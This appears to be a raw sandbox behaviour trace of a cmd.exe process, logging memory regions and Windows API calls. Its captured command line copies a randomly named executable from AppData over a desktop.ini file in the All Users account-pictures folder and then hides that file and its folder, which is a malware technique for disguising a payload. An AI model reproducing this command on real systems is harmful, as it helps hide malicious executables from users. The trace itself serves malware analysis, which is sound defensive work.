"imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24678 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24679 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 24680 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24681 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 24682 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 24683 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 24684 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 24685 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 24686 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 434 os_tid = 0xbb8 [0177.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8e4 | out: lpSystemTimeAsFileTime=0x14f8e4*(dwLowDateTime=0x9fbb83c0, dwHighDateTime=0x1d440a9)) [0177.859] GetCurrentProcessId () returned 0xb9c [0177.859] GetCurrentThreadId () returned 0xbb8 [0177.859] GetTickCount () returned 0x33810 [0177.859] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8dc | out: lpPerformanceCount=0x14f8dc*=23464849876) returned 1 [0177.860] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0177.860] __set_app_type (_Type=0x1) [0177.860] __p__fmode () returned 0x76b331f4 [0177.860] __p__commode () returned 0x76b331fc [0177.860] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0177.860] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0177.860] GetCurrentThreadId () returned 0xbb8 [0177.860] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb8) returned 0x38 [0177.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.860] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0177.860] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.861] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0177.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f874 | out: phkResult=0x14f874*=0x0) returned 0x2 [0177.861] VirtualQuery (in: lpAddress=0x14f8ab, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0177.861] GetConsoleOutputCP () returned 0x1b5 [0177.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.861] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0177.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0177.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.862] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.862] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0177.862] GetEnvironmentStringsW () returned 0x280538* [0177.862] FreeEnvironmentStringsW (penv=0x280538) returned 1 [0177.862] GetEnvironmentStringsW () returned 0x280538* [0177.862] FreeEnvironmentStringsW (penv=0x280538) returned 1 [0177.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7e4 | out: phkResult=0x14e7e4*=0x40) returned 0x0 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0xe8, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x0, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegCloseKey (hKey=0x40) returned 0x0 [0177.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7e4 | out: phkResult=0x14e7e4*=0x40) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x0, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x9, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x9, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x9, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegCloseKey (hKey=0x40) returned 0x0 [0177.863] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638d [0177.863] srand (_Seed=0x5b88638d) [0177.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" [0177.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" [0177.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.864] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281c98, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0177.864] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.864] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.864] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.864] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0177.864] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0177.864] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0177.864] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0177.864] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0177.864] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0177.864] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0177.864] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0177.864] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0177.864] GetEnvironmentStringsW () returned 0x282688* [0177.864] FreeEnvironmentStringsW (penv=0x282688) returned 1 [0177.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0177.865] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0177.865] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0177.865] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0177.865] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0177.865] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0177.865] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0177.865] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0177.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f5b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.865] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f5b0, lpFilePart=0x14f5ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f5ac*="Desktop") returned 0x18 [0177.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.865] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f32c | out: lpFindFileData=0x14f32c) returned 0x280d18 [0177.865] FindClose (in: hFindFile=0x280d18 | out: hFindFile=0x280d18) returned 1 [0177.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f32c | out: lpFindFileData=0x14f32c) returned 0x280d18 [0177.865] FindClose (in: hFindFile=0x280d18 | out: hFindFile=0x280d18) returned 1 [0177.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f32c | out: lpFindFileData=0x14f32c) returned 0x280d18 [0177.865] FindClose (in: hFindFile=0x280d18 | out: hFindFile=0x280d18) returned 1 [0177.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.866] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0177.866] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0177.866] GetEnvironmentStringsW () returned 0x280538* [0177.866] FreeEnvironmentStringsW (penv=0x280538) returned 1 [0177.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.866] GetConsoleOutputCP () returned 0x1b5 [0177.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.866] GetUserDefaultLCID () returned 0x409 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="0") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="0") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="1") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0177.867] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0177.868] GetConsoleTitleW (in: lpConsoleTitle=0x270b30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0177.868] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0177.868] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0177.869] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0177.869] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0177.869] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0177.869] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0177.869] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0177.869] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0177.869] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0177.871] _wcsicmp (_String1="del", _String2=")") returned 59 [0177.871] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0177.871] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0177.871] _wcsicmp (_String1="IF", _String2="del") returned 5 [0177.871] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0177.871] _wcsicmp (_String1="REM", _String2="del") returned 14 [0177.871] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0177.873] _wcsicmp (_String1="type", _String2=")") returned 75 [0177.873] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0177.873] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0177.873] _wcsicmp (_String1="IF", _String2="type") returned -11 [0177.873] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0177.873] _wcsicmp (_String1="REM", _String2="type") returned -2 [0177.873] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0177.877] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.877] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.886] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.887] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0xffffffff [0177.887] GetLastError () returned 0x2 [0177.887] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0xffffffff [0177.887] GetLastError () returned 0x2 [0177.887] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0x282600 [0177.888] FindClose (in: hFindFile=0x282600 | out: hFindFile=0x282600) returned 1 [0177.888] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0xffffffff [0177.888] GetLastError () returned 0x2 [0177.888] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ec20) returned 0x282600 [0177.888] FindClose (in: hFindFile=0x282600 | out: hFindFile=0x282600) returned 1 [0177.888] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.888] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.888] GetConsoleTitleW (in: lpConsoleTitle=0x14f118, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.888] InitializeProcThreadAttributeList (in: lpAttributeList=0x14efa0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f068 | out: lpAttributeList=0x14efa0, lpSize=0x14f068) returned 1 [0177.888] UpdateProcThreadAttribute (in: lpAttributeList=0x14efa0, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f060, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14efa0, lpPreviousValue=0x0) returned 1 [0177.888] GetStartupInfoW (in: lpStartupInfo=0x14ef5c | out: lpStartupInfo=0x14ef5c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0177.888] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.889] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14effc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f048 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessInformation=0x14f048*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb7c, dwThreadId=0xc00)) returned 1 [0177.893] CloseHandle (hObject=0x4c) returned 1 [0177.893] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.894] GetEnvironmentStringsW () returned 0x280b18* [0177.894] FreeEnvironmentStringsW (penv=0x280b18) returned 1 [0177.894] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0177.934] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14ef3c | out: lpExitCode=0x14ef3c*=0x0) returned 1 [0177.934] CloseHandle (hObject=0x50) returned 1 [0177.934] _vsnwprintf (in: _Buffer=0x14f084, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ef48 | out: _Buffer="00000000") returned 8 [0177.934] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.934] GetEnvironmentStringsW () returned 0x282670* [0177.934] FreeEnvironmentStringsW (penv=0x282670) returned 1 [0177.934] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.934] GetEnvironmentStringsW () returned 0x282670* [0177.934] FreeEnvironmentStringsW (penv=0x282670) returned 1 [0177.934] DeleteProcThreadAttributeList (in: lpAttributeList=0x14efa0 | out: lpAttributeList=0x14efa0) [0177.934] GetConsoleTitleW (in: lpConsoleTitle=0x14f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.934] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14e398, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e39c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14e398*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0177.935] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0177.935] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0177.935] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0177.935] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\desktop.ini")) returned 0xffffffff [0177.935] GetLastError () returned 0x2 [0177.935] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1")) returned 0x2010 [0177.935] 